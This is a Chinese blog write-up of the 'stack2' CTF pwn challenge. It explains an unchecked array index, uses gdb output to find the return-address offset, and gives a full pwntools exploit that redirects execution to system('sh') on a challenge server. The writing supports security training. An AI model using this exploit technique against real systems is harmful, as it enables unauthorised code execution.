攻防世界-stack2-Writeup

最新推荐文章于 2023-01-13 12:25:16 发布
最新推荐文章于 2023-01-13 12:25:16 发布
阅读量493 收藏
点赞数
文章标签: stack2 攻防世界
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43921239/article/details/106109319
版权

stack2

题目来源: XCTF 4th-QCTF-2018

[collapse title=“展开查看详情” status=“false”]

考点:数字下标溢出

保护情况:

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

漏洞函数:

puts("which number to change:");          // change
__isoc99_scanf("%d", &index);	//没有检查下标
puts("new number:");
__isoc99_scanf("%d", &num);
num_list[index] = num;

程序中找到有预留的后门函数,所以通过数组越界修改返回地址到后门。所以需要寻找 num_list 与 eip 的偏移。

寻找 eip 在栈上地址比较容易,将断点打在 main 退出前(0x080488EF),查看寄存器值:

────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────────────────────────────────────────────
 EAX  0x0
 EBX  0x0
 ECX  0xffffcfa0 ◂— 0x1
 EDX  0xf7fb887c (_IO_stdfile_0_lock) ◂— 0x0
 EDI  0xf7fb7000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
 ESI  0xf7fb7000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
 EBP  0x0
 # 返回地址在栈上位置
 ESP  0xffffcf9c —▸ 0xf7e1d637 (__libc_start_main+247) ◂— add    esp, 0x10
 EIP  0x80488f2 (main+802) ◂— 0x669066c3
────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────────────────────
 ► f 0  80488f2 main+802
   f 1 f7e1d637 __libc_start_main+247
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

写入地址在写入或者 show 操作汇编打断点,下面在录入时打断点找:

080486BD                 call    ___isoc99_scanf
080486C2                 add     esp, 10h
080486C5                 mov     eax, [ebp+num]
080486CB                 mov     ecx, eax
080486CD                 lea     edx, [ebp+num_list]//写入栈上
080486D0                 mov     eax, [ebp+var_7C]
080486D3                 add     eax, edx
080486D5                 mov     [eax], cl
080486D7                 add     [ebp+var_7C], 1

调试查看寄存器找到地址:

────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────────────────────────────────────────────
 EAX  0x56
 EBX  0x0
 ECX  0x56
 #写入地址
 EDX  0xffffcf18 ◂— 0x45 /* 'E' */
 EDI  0xf7fb7000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
 ESI  0xf7fb7000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
 EBP  0xffffcf88 ◂— 0x0
 ESP  0xffffcee0 —▸ 0xf7ffda74 —▸ 0xf7fd5470 —▸ 0xf7ffd918 ◂— 0x0
 EIP  0x80486d0 (main+256) ◂— 0x184458b
──────────────────────────────────────────────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────────────────────────────────────────────
   0x80486c2 <main+242>    add    esp, 0x10
   0x80486c5 <main+245>    mov    eax, dword ptr [ebp - 0x88]
   0x80486cb <main+251>    mov    ecx, eax
   0x80486cd <main+253>    lea    edx, [ebp - 0x70]
 ► 0x80486d0 <main+256>    mov    eax, dword ptr [ebp - 0x7c]
   0x80486d3 <main+259>    add    eax, edx
   0x80486d5 <main+261>    mov    byte ptr [eax], cl
   0x80486d7 <main+263>    add    dword ptr [ebp - 0x7c], 1
   0x80486db <main+267>    mov    edx, dword ptr [ebp - 0x7c]
   0x80486de <main+270>    mov    eax, dword ptr [ebp - 0x90]
   0x80486e4 <main+276>    cmp    edx, eax

计算得出偏移:0xffffcf9c-0xffffcf18=0x84

**后门函数只能本地打通,远程服务器没有 bash 指令。**我就 ROP 和泄露 libc 地址了。看了大佬 wp 发现 system(sh)也能 getshell ,所以脚本如下:

完整exp:

from pwn import *

context.log_level = 'debug'
p = process("./stack2")
p = remote("124.126.19.106",42070)

def change(index,context):
	p.sendlineafter("exit",'3')
	p.sendlineafter('change',str(index))
	p.sendlineafter("number",str(context))


p.sendlineafter("have:",'2')
p.sendline(str(0x45))
p.sendline(str(0x56))

#system_plt
change(0x84+0,0x50)
change(0x84+1,0x84)
change(0x84+2,0x04)
change(0x84+3,0x08)
#gdb.attach(p)

#sh
change(0x84+8,0x87)
change(0x84+9,0x89)
change(0x84+10,0x04)
change(0x84+11,0x08)

p.sendlineafter("exit",'5')
p.interactive()

[/collapse]

SkYe231_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux pwn入门教程(3)——ROP技术
xiaoi123的博客
07-10 7538
作者:Tangerine@SAINTSEC原文来自:https://bbs.ichunqiu.com/thread-42530-1-1.html0×00 背景在上一篇教程的《shellcode的变形》一节中,我们提到过内存页的RWX三种属性。显然,如果某一页内存没有可写(W)属性,我们就无法向里面写入代码,如果没有可执行(X)属性,写入到内存页中的shellcode就无法执行。关于这个特性的实验在...
攻防世界pwn——stack2
qq_62076255的博客
12-18 565
攻防世界pwn——stack2做题记录
pwn-进阶-forgot
weixin_45971758的博客
08-19 1311
1.checksec先检查,开启的保护以及程序情况。 开启了NX(地址随机化保护) , 就意味着程序地址分布随机。 32位小段序,输入的变量数据在地址中的存放位置(安装小段序存放)。 2.静态调试(静态查看) 将文件拖入到 ida 32位,然后确定。 shift+F12看到程序出现的字符串,发现下面。 有./flag cat %s , 双击字符串并且看到了在.rodata 的存放位置,后面还有一个函数。 双击此函数,查看函数全部信息。 这样就看到了函数全貌。之后按F5(笔记本电脑键盘FN+F5),查
攻防世界pwn题--stack2
L0g1c的博客
10-31 477
查看保护机制 (有栈不可执行NX,有canary保护) 用IDA分析(查看伪代码) int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax unsigned int v5; // [esp+18h] [ebp-90h] unsigned int v6; // [esp+1Ch] [ebp-8Ch] int v7; // [esp+20h] [ebp-88h] unsigned
攻防世界PWN进阶区(stack2)
BurYiA的博客
01-26 867
stack2 哈,我又回来了 这个题呢,基本rop,但有几个点比较难弄… 比如:偏移不好求,环境中没有/bin/bash等… 言归正传,我们先看一下基本信息 32位程序,有NX,有Canary。 运行可以发现它可以创建一个存储数字的数组,创建好以后我们可以对其中的数据进行一些基本的操作,ok,接下来开始硬刚IDA 通过观察main函数伪代码我们可以发现上图这个位置有点小问题 这个时对数据进行...
Z-Stack 3.0.2.zip
03-20
TI Z-Stack 3.0.2官方原版,zigbee TI 开发官方BSP,支持TI CC2530,CC2538等多款器件!
redis-stack-server 7.2.0 安装包合集
04-03
redis-stack-server-7.2.0-v9.arm64.snap redis-stack-server-7.2.0-v9.bionic.arm64.tar.gz redis-stack-server-7.2.0-v9.bionic.x86_64.tar.gz redis-stack-server-7.2.0-v9.bullseye.x86_64.tar.gz redis-stack-...
基于Z-Stack的点对点通信_zigbeecc2530_z-stack_
10-01
CC2530 Z-stack
Z-Stack 3.0.2 和 2.5.1协议栈
11-13
Z-Stack 3.0.2和 2.5.1 协议栈. TI公司在推出CC2530同时, 发布的Zigbee协议栈.
Z-Stack 3.0.2-.7z.zip_Z-STACK 3.0.2_Z-STACK-3.0.2_z-stack 3_z-st
07-15
最近发布的Zstack 3.0.2 SDK 和说明文档
攻防世界高手进阶区——stack2
weixin_62675330的博客
02-24 893
攻防世界高手进阶区——stack2 看题目啥都没有 一,分析文件 checksec 发现居然存在栈溢出保护,这是以前做题没看到过的,可能会有新的知识点。 运行文件 貌似是一个输入数字计算平均值的程序。 ida打开 unsigned int m; // [esp+34h] [ebp-74h] char v13[100]; // [esp+38h] [ebp-70h] unsigned int v14; // [esp+9Ch] [ebp-Ch] v14 = __readgs
白泽知识讲堂 | printf漏洞介绍
木牛的博客
01-13 722
我们已经知道,printf函数在执行时,首先进行格式化字符串的解析——从栈(或者寄存器)获取参数并与符号说明进行匹配,然后将匹配的结果输出到屏幕上。相信大家对于简单的符号说明并不陌生,但如果要利用。,而我们又能控制格式化字符串时,只要我们构造一个合适的payload,一个'%K$s'和一个任意合理地址,(由于我们可以使用多个%p的方法找到合适的K来对应这个地址),我们便可以。,表明写入的长度,h表示一次覆盖两个byte,而hh表示一次写入一个byte,如果不对n进行修饰,则默认为写入四个byte。
【计算机系统(2)】3 逆向工程实验
深大cs课程实验及学习笔记,ccfcsp部分真题,华为题库
06-19 1743
本实验设计为一个黑客拆解二进制炸弹的游戏。我们仅给黑客(同学)提供一个二进制可执行文件bomb_64和主函数所在的源程序bomb_64.c,不提供每个关卡的源代码。程序运行中有6个关卡(6个phase),每个关卡需要用户输入正确的字符串或数字才能通关,否则会引爆炸弹(打印出一条错误信息,并导致评分下降)! 要求同学运用GDB调试工具和objdump反汇编工具,通过分析汇编代码,找到在每个phase程序段中,引导程序跳转到“explode_bomb”程序段的地方,并分析其成功跳转的条件...
攻防世界 Misc高手进阶区 5分题 picture2
闵行小鱼塘
12-17 1518
继续ctf的旅程,攻防世界Misc高手进阶区的5分题,本篇是picture2的writeup
CTF-PWN笔记(二)-- 格式化字符串漏洞
CK_0ff的博客
01-27 1199
文章目录漏洞介绍格式化字符串的格式漏洞原理及利用例题 漏洞介绍 格式化字符串(英语:format string)是一些程序设计语言的输入/输出库中能将字符串参数转换为另一种形式输出的函数。例如C、C++等程序设计语言的printf类函数,其中的转换说明(conversion specification)用于把随后对应的0个或多个函数参数转换为相应的格式输出;格式化字符串中转换说明以外的其它字符原样输出。 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。 通俗来
三个pwn题
weixin_52640415的博客
06-28 1636
shortcut :格式化字符串漏洞写溢出 lucky_guy:alloca负值覆盖ret babynote:libc-2.31禁用exec写 ORW free_hook->sigreturnframe-> setcontex+61->orw
攻防世界》stack2逻辑漏洞题
csdn546229768的博客
11-16 3664
到了进阶题目越来越好玩了,发现解出来一道题有解数学那味了 嗯,拿到题目一看逻辑题,做题刚打完比赛(第一次)被逆向和pwn的逻辑题给整怕了,这次遇到这种题目,我选择硬刚! 首先读懂题目的内在逻辑,并关注常见的pwn漏洞,首先一步步分析 这里有个循环100次接收输入,全局的看了下都是在对buf操作,先标志一手,但是这里无法产生溢出,那么看下面 首先看到for里面初始化j = v5 ,那么这个j也就是我们可控的标记一下,然后就是死循环,每次循环后调用一次printf select1就是显示所有值、select
攻防世界pwn难度1
weixin_63282980的博客
11-05 1607
攻防世界难度1的题目WP
2019.7.26 攻防世界Stack2 以及gdb 和IDA算偏移
DSR446的博客
08-19 2436
我们很明显这里有一个数组越界的漏洞我们可以利用。 [这个博客写的很详细]https://blog.csdn.net/qq_41071646/article/details/86600053 下面我就只介绍一下怎么算的偏移。 ...
Z-Stack工作流程
最新发布
04-07
2. 网络组建:Z-Stack支持多种网络拓扑结构,如星型、网状和混合结构。在网络组建阶段,设备通过协议栈中的网络层和MAC层协议进行节点的加入、路由表的建立和网络拓扑的维护。 3. 数据传输:一旦网络建立完成,节点...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值